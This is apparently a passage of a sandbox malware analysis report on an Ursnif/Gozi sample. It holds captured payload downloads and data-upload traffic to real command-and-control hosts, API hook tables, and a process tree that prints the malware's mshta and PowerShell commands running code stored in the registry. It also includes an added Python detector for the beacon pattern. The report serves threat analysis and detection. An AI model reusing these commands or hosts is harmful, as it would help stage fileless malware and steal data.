48 48 3d 72 d7 a7 da 5d 2d 7f 47 a5 6a f6 ad a7 ff 84 58 75 92 9a 9d a4 dd d2 f5 ad df ad 48 fb bd 27 0e 25 49 5e 64 16 b6 0e 73 f9 e4 17 d2 5b 6d c8 22 d8 43 48 56 15 fb 9c 42 56 39 a3 70 64 c8 33 f6 e4 9f 56 0d ad ab 1d d6 13 6b 29 72 9a 9f 67 d1 
09 d8 8d a9 f1 da 83 11 71 c6 36 f6 0f fd 15 ea 7d c2 b9 7c 50 0a 64 57 df 84 23 16 33 a9 63 44 2c cd 9f 91 91 48 62 6f 01 de a9 79 f9 9f e5 da c2 2f 3d 3d 8d f3 15 90 5e 40 97 b7 89 80 7c e7 b8 25 3b e5 fd c3 59 b8 96 6f 1b f5 f1 a8 e7 93 9a f3 2e 1b 20 f5 81 30 04 e7 1f b1 c1 26 0a 66 9e 5a 26 8a 84 87 62 19 40 91 4b 09 f5 b6 6e dd 85 e3 0c c3 8d 5c 81 1c 75 ff cd 82 f6 f9 19 9b b7 89 84 7f 7e 93 48 e8 dd 3f 78 6e 56 16 76 fb 0c 99 76 d6 ab a5 59 c5 f8 69 60 1c 39 69 a2 30 2b 2d 13 2e 87 9f 15 80 a5 95 d0 d5 74 62 e0 7e 5b e2 31 9a 26 55 f7 26 85 94 f7 52 17 b5 b4 48 bd 3d d9 41 ae 57 4b fc d6 18 61 b6 bf 00 46 21 bf 78 9c bf 34 f9 82 ea 25 00 a1 1d f6 6c 13 14 e9 e7 c8 43 e0 34 cb 4c 95 b5 74 cc d4 24 c4 46 51 f5 86 70 d2 f9 54 8b 6d 76 cf f6 78 76 c0 f8 e8 bf dc 50 7a a6 3b e2 c8 5c 13 da bb fc d7 c4 a4 7d ec 16 79 f1 e7 b8 91 93 a6 8f e9 71 24 2d 4a 35 34 c5 60 83 1b 33 af 4f 95 07 b7 e8 27 92 89 62 82 70 1f ac da f6 38 c8 6f d7 2d da 85 e7 6b 98 21 b8 ba fe 3c ed a9 10 6f 75 e0 75 35 b9 41 a8 d5 98 c5 64 ff 05 c0 67 c2 99 d2 5d 5a 36 a2 8c 3f 4d 85 8c 88 c5 d3 2f 07 7d 8d 0e d5 35 3b 0a a3 ba e6 c9 f3 45 c3 d1 20 d1 d0 70 9c 38 4d 7d 5f 8d 5a 3c 5c be c4 8d 0b 94 a2 61 ec 32 78 8a 7d c2 ec d9 af 05 02 38 d6 ed f3 9c ee 02 c6 6a 90 1b 1a 76 57 73 d7 ed a5 1f ee 98 96 63
                                                        Data Ascii: m*B=}GS#2oSjC<ZkW&zlZgs8OWoDjaL(F)[|cqmB.Y)|?wk K*)oi]>BQ,*VBnf7n|q4^yl|2"=VivyFwzSkjH19td$K95_OzU)>&__lx;)R<jrYak*}R@3g 0@yfMZeCQ,U9KjGL6*!]rxSJ!XqkT?48k\~[4z`w[MBqVXB{",m{{m}dw/ cE{C?c"n3lK7e2h.#HH=r]-GjXuH'%I^ds[m"CHVBV9pd3Vk)rgq6}|PdW#3cD,Hboy/==^@|%;Yo. 0&fZ&b@Kn\u~H?xnVvvYi`9i0+-.tb~[1&U&RH=AWKaF!x4%lC4Lt$FQpTmvxvPz;\}yq$-J54`3O'bp8o-k!<ouu5Adg]Z6?M/}5;E p8M}_Z<\a2x}8jvWsc
                                                        May 4, 2022 16:21:21.354583979 CEST | 12447 | OUT | GET /cook64.rar HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                                                        Host: 193.56.146.127
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        May 4, 2022 16:21:21.424647093 CEST | 12448 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.14.2
                                                        Date: Wed, 04 May 2022 14:21:21 GMT
                                                        Content-Type: application/x-rar-compressed
                                                        Content-Length: 476828
                                                        Last-Modified: Tue, 25 Jan 2022 14:33:43 GMT
                                                        Connection: keep-alive
                                                        ETag: "61f00a47-7469c"
                                                        Accept-Ranges: bytes
                                                        Data Raw: 5d 8b 8b 70 09 0e 1d d9 90 dd ab 7b 33 6a c0 52 31 a0 b6 04 f6 3f 2c 2e c3 a2 b0 07 ab 38 fc 74 ed fa 59 e1 54 59 8e 5a d4 67 4d 48 cf 9f 04 d9 44 fe 6c 57 29 99 30 f7 01 d0 36 58 0f ca d2 73 70 1b f2 92 c3 7c b0 3e 78 94 57 f4 4b 39 77 05 b8 ed 02 5e 12 4d a6 e1 05 bd f8 f7 d0 d3 a9 57 55 34 57 87 40 e8 b9 6e f0 ed b3 db 4d d9 05 e2 95 5c 9f 02 48 e3 34 67 c4 9b c0 1d c1 c5 bb 24 97 c6 50 01 fa 49 39 fe 75 1f 0a cd 7a 85 7c 3e 16 e7 e0 9d 81 48 fc dd e7 f1 c9 40 7f d9 9b a3 0d 47 7e 92 cb bf b8 20 da cd 79 0a 4d 36 0d b3 c3 07 69 6d f6 b1 f7 16 08 4d 9d 4d 3f 64 80 88 78 d5 5e 87 99 18 f7 12 21 85 7b eb e6 e1 da 00 0b 9e 5a 71 f7 a8 d7 1a 90 73 9e f2 5c 58 fe c7 3b d3 50 e2 f5 6a 2c 9d 8e 92 29 e1 cd 48 ef 98 a1 fb b3 f8 a2 4e b0 b5 38 26 8d 53 db a2 fc ce 6d 68 10 e7 2f e5 f9 85 ed 30 21 92 ff 70 02 7e 81 35 20 c0 ef ca c1 26 c7 af 71 43 ee ae 83 a2 48 a2 80 67 06 47 4f cf 11 52 22 6c 92 7d d5 97 98 fc 3a 05 f7 bd 2a 25 56 2a 75 75 71 a8 d9 03 23 39 d2 9d e4 98 16 0c 8c db b9 7a 07 7c 0a 6d ff 9b 86 a2 66 05 12 59 42 0d 1c 4c 41 17 ef 22 93 8b 8f b4 16 ea a7 65 a2 f2 86 50 8e 7f 69 86 be 4c a4 a9 59 1c 9b f3 9f 0b 9c 10 6e b5 22 b7 ae 7b b1 fe 1c 95 d6 9c a1 09 44 dc 9c f4 f1 4c de 51 5d 68 07 c9 c4 5d ff 0c e1 b6 0c 22 f4 4b bd 4c 90 32 b0 ba 85 9f 26 76 c8 98 ea 24 ea 9b e4 b8 a6 7c bf a3 36 76 9d e4 10 f7 ba 31 a7 43 fa f1 62 26 3d 4c 8a 9a 05 4f 31 c1 45 8d 82 49 7e f1 5b aa 01 0e 36 1c 0b 54 ae 27 c3 5c cf eb d9 3d 13 11 c3 33 c7 63 79 1d aa 1c f7 d5 73 58 da 62 fd c5 2e e1 2f a0 4a f5 15 c6 7d 26 3d 43 80 c9 3c 2d 7f 2e df 94 f4 e4 95 7a e6 92 36 e2 eb 6c c6 08 80 4f 5c 8d 79 5f 59 ac b1 a8 ef 57 99 26 e7 a7 c0 52 18 16 02 ad 0c ca ef c6 74 5a f0 04 33 a3 ea 81 15 32 78 f5 39 db 07 45 f6 b7 f4 d8 76 44 f7 d9 70 ab 52 38 48 6d d9 74 d0 2b a1 02 00 72 9d 11 b6 31 88 95 31 42 48 0e 6a 29 df f0 9b 9a 66 a0 68 bc e2 0d b6 70 a0 15 a7 9b cc 07 b6 9c e4 e5 e5 21 8e 3c 9b 89 9b 15 63 98 47 50 c0 47 
eb 3d f9 48 20 db b4 1f 17 e2 6a 16 4a 1b 35 06 f4 1a cc 7a 68 f8 92 dd d7 a1 0b 72 9b 63 7d b3 a3 e5 04 d5 3a f1 15 8f e0 28 7f 17 89 c7 ad 50 62 02 dd 90 74 f4 7a 95 9c 54 cc e6 8f e6 3b 81 d1 eb 80 de 9b b8 d3 2f 23 e3 f4 5c 16 9c 16 32 bd d4 53 7b b8 53 37 2c 83 21 c6 91 69 06 67 e8 55 85 41 ec 02 90 9a be 15 0d 85 18 50 dc cf 14 a8 c7 e1 bf 67 da 8a 41 15 9d 84 1d 65 56 97 db 7e 39 d3 0e 82 a4 32 48 5f d9 30 ef 1b 7e e4 fa b9 c2 c6 b0 d9 7d f4 6f 1c 4d 31 6b a6 9a b9 5e be 6e 9b 66 8f a3 52 6d ce dd 26 f8 1d bf d1 d8 fe 25 26 12 38 1b 82 d0 20 3b b0 3a fc 78 fc c8 27 35 80 8c 3d 50 5e ac c0 9e 9d 60 4a d8 67 fd 0b 23 73 81 de e8 b6 92 23 2a 8b 3a 3e 6b c6 30 c7 50 f7 e0 9f 2d 41 bc 35 53 4a e5 0d 04 6e b3 3e 74 33 6d 8f 7e 23 d7 bf 78 78 ef ae 5a b9 bc 02 45 46 d8 8c 41 c3 a9 4e 7f 95 d2 4c d0 e0 2a 09 df b3 ad d9 52 c0 cb 92 bb 54 36 e8 82 b6 65 88 39 d7 a3 ec 7f 3a 70 bc 89 a3 24 54 c1 36 15 89 70 44 54 cc 9d 36 48 a4 0b 08 82 70 e1 8f 42 83 01 2c 8a 46 89 74 3b f0 2e 6c dd 01 ce 2d 06 bc 25 97 f6 98 1e d3 17 ab 54 a1 bc 7d b1 0b ce 72 55 e0 4b 60 12 34 c2 16 18 66 cb dc a6 fa 75 1c eb cf 35 22 58 8b 6f b0 53 f0 ac 29 7b 05 a8 36 39 ec ea 59 a1 d0 84 23 99 b9 d8 00 95 20 e1 45 61 c2 89 5d 33 c2 03 ce 59 4c a8 a0 7c b9 1a cb 8b b5 01 26 93 12 8e 7c 1e fb be 43 c8 53 8c
                                                        Data Ascii: ]p{3jR1?,.8tYTYZgMHDlW)06Xsp|>xWK9w^MWU4W@nM\H4g$PI9uz|>H@G~ yM6imMM?dx^!{Zqs\X;Pj,)HN8&Smh/0!p~5 &qCHgGOR"l}:*%V*uuq#9z|mfYBLA"ePiLYn"{DLQ]h]"KL2&v$|6v1Cb&=LO1EI~[6T'\=3cysXb./J}&=C<-.z6lO\y_YW&RtZ32x9EvDpR8Hmt+r11BHj)fhp!<cGPG=H jJ5zhrc}:(PbtzT;/#\2S{S7,!igUAPgAeV~92H_0~}oM1k^nfRm&%&8 ;:x'5=P^`Jg#s#*:>k0P-A5SJn>t3m~#xxZEFANL*RT6e9:p$T6pDT6HpB,Ft;.l-%T}rUK`4fu5"XoS){69Y# Ea]3YL|&|CS


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        2 | 192.168.2.4 | 49825 | 116.121.62.237 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        May 4, 2022 16:21:23.154438972 CEST | 12942 | OUT | GET /images/V0NO_2B_2/BKtxKUyqNZPWTGW_2Fsb/gcra1vUcqfsugEwbqkg/clC4xOvGOnv1IfCbC3KpDN/55o4c2l5_2FQ5/A5h2Nudl/_2BMxe_2B5DeFfkUNA5tHFs/S3JUh8OxeK/2_2FH31SGSIQagA1v/1cdYZqzVHkrq/508837BCT1F/BqNIRlNPeT4DuE/7TejdrPxV03GXRoV_2Bn_/2BLetz9nfjFhAFKH/XzqzBZbDgeQBfEL/knvoVinzLGANv8j5GP/MiBxeoPgM/h0e0hiZpA4rDs4gKFEOR/z8BKZois5KcoiHgGkl6/XYwiOQ0Qo28lWHm/byQpQm.gif HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                                                        Host: cabrioxmdes.at
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        May 4, 2022 16:21:24.441509008 CEST | 12942 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Wed, 04 May 2022 14:21:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Connection: close
                                                        Vary: Accept-Encoding


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        3 | 192.168.2.4 | 49836 | 116.121.62.237 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        May 4, 2022 16:21:35.078524113 CEST | 12968 | OUT | POST /images/ycZgts7gGB1TTI_2BJ/kAFzWH5dO/EouFwEOlBnMQFd_2B9cm/hFllbR62yV2D6DpnFIT/1m7iL_2BNn_2FiW_2Fey46/UbiTO8_2BKiyZ/X_2Fw6C8/_2BYemffpjXv9AYl0VWdt5P/DII_2F9NDv/YDhvS6DNSnB9Ol87V/O37_2FvxkOTf/eEAAdQaaXJB/BDgwSc3qOdxCUN/5Mw_2FSE2hFdSZTrFlwZP/7mWxeoDw9vW5V8uP/HsY9e6csLMEHi74/FnD5yUP5tDxrs5O87k/gamDdyFb5/q42.bmp HTTP/1.1
                                                        Content-Type: multipart/form-data; boundary=318247997342640097891112487322
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                                                        Host: cabrioxmdes.at
                                                        Content-Length: 563
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        May 4, 2022 16:21:35.080523968 CEST | 12968 | OUT | Data Raw: 2d 2d 33 31 38 32 34 37 39 39 37 33 34 32 36 34 30 30 39 37 38 39 31 31 31 32 34 38 37 33 32 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 70 6c 6f 61 64 5f 66 69 6c
                                                        Data Ascii: --318247997342640097891112487322Content-Disposition: form-data; name="upload_file"; filename="90BF.bin"k]pv 6_[Ac[tgK(0>\22n3^N]xR6<:8Ot]@]_J<,~5Z[gX[s*zdHFD&v
                                                        May 4, 2022 16:21:36.648550987 CEST | 12983 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Wed, 04 May 2022 14:21:36 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Connection: close
                                                        Vary: Accept-Encoding


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        4 | 192.168.2.4 | 49845 | 116.121.62.237 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        May 4, 2022 16:21:37.325897932 CEST | 12991 | OUT | POST /images/x2n_2BZq/cMTCmy3PTwcmYJsQtcFfdmd/RGHbCfH0Mi/_2F2XXxRKDznMaDCu/6VijCL7TOw6A/_2FZwep2qr_/2FWEPkZM5AVXte/9aqioax34nJsL5Jif0tvs/L_2FZYT61ziDpxF7/LpFCetnlC9m_2Bt/oUT730x_2F0HUFQM3Y/XzNhPma_2/B16XqKLqfQsgSGMPR6I2/0aqjgbQwdUeD2pbxvCW/nFGCHfIsUA4BQ8wKgww64R/38SNs6vk5dFLz/lF2ZfIKN/ONI_2FioD0xOFaZ_2BUESxI/wtoW_2F78Wali9Dqxz_/2F8R.bmp HTTP/1.1
                                                        Content-Type: multipart/form-data; boundary=315998012542640097891134987170
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                                                        Host: cabrioxmdes.at
                                                        Content-Length: 387
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        Data Raw: 2d 2d 33 31 35 39 39 38 30 31 32 35 34 32 36 34 30 30 39 37 38 39 31 31 33 34 39 38 37 31 37 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 70 6c 6f 61 64 5f 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 38 34 43 32 2e 62 69 6e 22 0d 0a 0d 0a c4 3a 05 dc 08 18 e8 11 ed cf a4 0c ab c1 02 66 7d 8c 42 f8 e1 54 84 bf 45 eb 69 35 db 71 df 5a 7f 36 2e 39 a9 d4 bc 44 3f a5 2d 4f e4 77 6d 4d e9 fd cb 9f 34 d3 52 90 c7 ef 96 8b 3a 51 52 33 1e 4e d7 58 12 20 f0 a1 ba 72 e2 a4 65 f4 9c 4a ba eb 0d a4 54 4a 8d a0 e6 5c df 1a 39 1e 99 48 4e bf 06 66 06 d2 5a c9 d5 25 ba ab df 3a 46 79 a9 9f 83 41 05 5b 19 68 e6 69 3c fa 64 22 5f d7 f5 51 fa 1a 19 70 83 6d 10 60 e4 02 29 a5 fe f7 70 0e ed 73 f8 c2 02 d4 cc d9 86 fb 43 90 cd b5 d4 4d 65 6e f2 f6 86 52 19 54 55 bf bc d5 03 6f 02 d5 2c db 53 12 f0 55 f2 6b bf 87 b2 cc aa 53 11 20 16 69 ac 25 cc fe 66 c8 96 93 c4 85 7f df 36 8f ff e7 40 65 fe 99 ce cc 93 52 c1 0b 35 49 c7 bb e4 4a 3a 27 ce 10 6b ec c7 39 84 5a 65 f9 0d 0a 2d 2d 33 31 35 39 39 38 30 31 32 35 34 32 36 34 30 30 39 37 38 39 31 31 33 34 39 38 37 31 37 30 2d 2d 0d 0a
                                                        Data Ascii: --315998012542640097891134987170Content-Disposition: form-data; name="upload_file"; filename="84C2.bin":f}BTEi5qZ6.9D?-OwmM4R:QR3NX reJTJ\9HNfZ%:FyA[hi<d"_Qpm`)psCMenRTUo,SUkS i%f6@eR5IJ:'k9Ze--315998012542640097891134987170--
                                                        May 4, 2022 16:21:38.620135069 CEST | 12997 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Wed, 04 May 2022 14:21:38 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Connection: close
                                                        Vary: Accept-Encoding

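The three explorer.exe sessions above show the whole beacon shape in one place: a retired MSIE 8 User-Agent, a GET for a long pseudo-random `/images/...` path ending in `.gif`, then two POSTs to paths of the same shape ending in `.bmp` that carry a multipart `upload_file` part named `<hex>.bin`, with `_2B` and `_2F` standing in for the base64 characters `+` and `/` in every path. The two `.rar` fetches before them go to a bare IP with the same User-Agent. The script below is an added example, not part of the Joe Sandbox report: it parses a request transcript into sessions and scores each request against exactly those observations. `TRANSCRIPT` is a constructed, shortened copy of the requests on this page (URI segments trimmed, binary bodies replaced by a placeholder) plus one constructed benign request as a control; the technique names, the segment count and the two-signal threshold are this example's choices, not something the report states.

```python
"""Flag Ursnif/Gozi-style HTTP requests in a client request transcript.

Added example, not part of the sandbox report. TRANSCRIPT is a constructed,
shortened copy of the requests captured on this page plus one benign control.
The heuristics encode only what the captured traffic shows; thresholds are
this example's own choice.
"""
import re
from dataclasses import dataclass, field

# Constructed sample input: abbreviated copies of the page's requests + a benign control.
TRANSCRIPT = """\
GET /cook32.rar HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
Host: 193.56.146.127
Connection: Keep-Alive

GET /images/V0NO_2B_2/BKtxKUyqNZPWTGW_2Fsb/gcra1vUcqfsugEwbqkg/byQpQm.gif HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
Host: cabrioxmdes.at
Connection: Keep-Alive

POST /images/x2n_2BZq/cMTCmy3PTwcmYJsQtcFfdmd/RGHbCfH0Mi/_2F2XXxRKDznMaDCu/2F8R.bmp HTTP/1.1
Content-Type: multipart/form-data; boundary=315998012542640097891134987170
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
Host: cabrioxmdes.at
Content-Length: 387

--315998012542640097891134987170
Content-Disposition: form-data; name="upload_file"; filename="84C2.bin"

<binary omitted>
--315998012542640097891134987170--

GET /index.html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/99.0
Host: example.org
"""

REQUEST_LINE = re.compile(r"^(?P<method>GET|POST) (?P<uri>\S+) HTTP/1\.[01]$", re.MULTILINE)
LEGACY_MSIE_UA = re.compile(r"^Mozilla/4\.0 \(compatible; MSIE [5-8]\.0; Windows NT")
BARE_IP_HOST = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")
# '/images/' followed by at least three random-looking segments and an image extension.
IMAGE_PATH = re.compile(r"^/images/(?:[A-Za-z0-9_]+/){2,}[A-Za-z0-9_]+\.(?:gif|bmp)$")
# The multipart part seen in both POSTs: name="upload_file"; filename="<4 hex>.bin".
UPLOAD_PART = re.compile(r'name="upload_file"; filename="(?P<name>[0-9A-F]{4}\.bin)"')


@dataclass
class Request:
    method: str
    uri: str
    headers: dict
    body: str
    reasons: list = field(default_factory=list)


def parse_requests(text):
    """Split a transcript of client requests into Request objects (headers lower-cased)."""
    starts = [m.start() for m in REQUEST_LINE.finditer(text)]
    requests = []
    for i, start in enumerate(starts):
        end = starts[i + 1] if i + 1 < len(starts) else len(text)
        head, _, body = text[start:end].partition("\n\n")
        lines = head.splitlines()
        first = REQUEST_LINE.match(lines[0])
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        requests.append(Request(first["method"], first["uri"], headers, body))
    return requests


def score(req):
    """Return the list of signals a single request triggers."""
    reasons = []
    if LEGACY_MSIE_UA.match(req.headers.get("user-agent", "")):
        reasons.append("retired MSIE User-Agent")
    if BARE_IP_HOST.match(req.headers.get("host", "")):
        reasons.append("Host header is a bare IP address")
    if IMAGE_PATH.match(req.uri):
        reasons.append("random-segment /images/ path with image extension")
        if "_2B" in req.uri or "_2F" in req.uri:
            reasons.append("_2B/_2F escaped base64 in path")
    if req.method == "POST":
        part = UPLOAD_PART.search(req.body)
        if part:
            reasons.append(f"multipart upload_file part {part['name']}")
    return reasons


def flag_c2(text, threshold=2):
    """Parse a transcript and return the requests with at least `threshold` signals."""
    flagged = []
    for req in parse_requests(text):
        req.reasons = score(req)
        if len(req.reasons) >= threshold:
            flagged.append(req)
    return flagged


if __name__ == "__main__":
    for req in flag_c2(TRANSCRIPT):
        print(f"{req.method} {req.headers.get('host', '?')}{req.uri}")
        for reason in req.reasons:
            print("   -", reason)
```

The threshold exists because the User-Agent on its own is a weak signal (legacy tooling still sends it); the bare-IP payload fetch and the beacon path shape each add an independent observation, and the `upload_file` part is what turns a beacon into confirmed exfiltration. On a real proxy log the same `score()` would run per request line, with the parsed URI and Host replacing the transcript parser.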

                                                        Code Manipulations

                                                        Function Name | Hook Type | Active in Processes
                                                        CreateProcessAsUserW | EAT | explorer.exe
                                                        CreateProcessAsUserW | INLINE | explorer.exe
                                                        CreateProcessW | EAT | explorer.exe
                                                        CreateProcessW | INLINE | explorer.exe
                                                        CreateProcessA | EAT | explorer.exe
                                                        CreateProcessA | INLINE | explorer.exe
                                                        api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW | IAT | explorer.exe
                                                        api-ms-win-core-registry-l1-1-0.dll:RegGetValueW | IAT | explorer.exe
                                                        Function Name | Hook Type | New Data
                                                        CreateProcessAsUserW | EAT | 7FF80250521C
                                                        CreateProcessAsUserW | INLINE | 0xFF 0xF2 0x25 0x50 0x00 0x00
                                                        CreateProcessW | EAT | 7FF802505200
                                                        CreateProcessW | INLINE | 0xFF 0xF2 0x25 0x50 0x00 0x00
                                                        CreateProcessA | EAT | 7FF80250520E
                                                        CreateProcessA | INLINE | 0xFF 0xF2 0x25 0x50 0x00 0x00
                                                        Function Name | Hook Type | New Data
                                                        api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW | IAT | 7FF802505200
                                                        api-ms-win-core-registry-l1-1-0.dll:RegGetValueW | IAT | 7E3B6B0
                                                        Function Name | Hook Type | New Data
                                                        api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW | IAT | 7FF802505200
                                                        api-ms-win-core-registry-l1-1-0.dll:RegGetValueW | IAT | 7E3B6B0


                                                        Target ID:0
                                                        Start time:16:18:46
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\loaddll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:loaddll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll"
                                                        Imagebase:0x110000
                                                        File size:116736 bytes
                                                        MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:1
                                                        Start time:16:18:46
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1
                                                        Imagebase:0x1190000
                                                        File size:232960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:2
                                                        Start time:16:18:46
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1
                                                        Imagebase:0x11a0000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.443486378.00000000055EF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.322984868.000000000576C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.274118654.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.274312246.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.274347577.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.442564309.00000000052F9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.274283989.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.274051962.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.320061792.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.274249118.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.274172697.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.322240934.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.322078024.000000000586A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.322135875.00000000058E9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.274335301.0000000005968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high

                                                        Target ID:19
                                                        Start time:16:19:23
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\mshta.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cq7h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cq7h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                                                        Imagebase:0x7ff70ad70000
                                                        File size:14848 bytes
                                                        MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:20
                                                        Start time:16:19:26
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jasvusrvks -value gp; new-alias -name ssmthn -value iex; ssmthn ([System.Text.Encoding]::ASCII.GetString((jasvusrvks "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                                                        Imagebase:0x7ff6ba650000
                                                        File size:447488 bytes
                                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
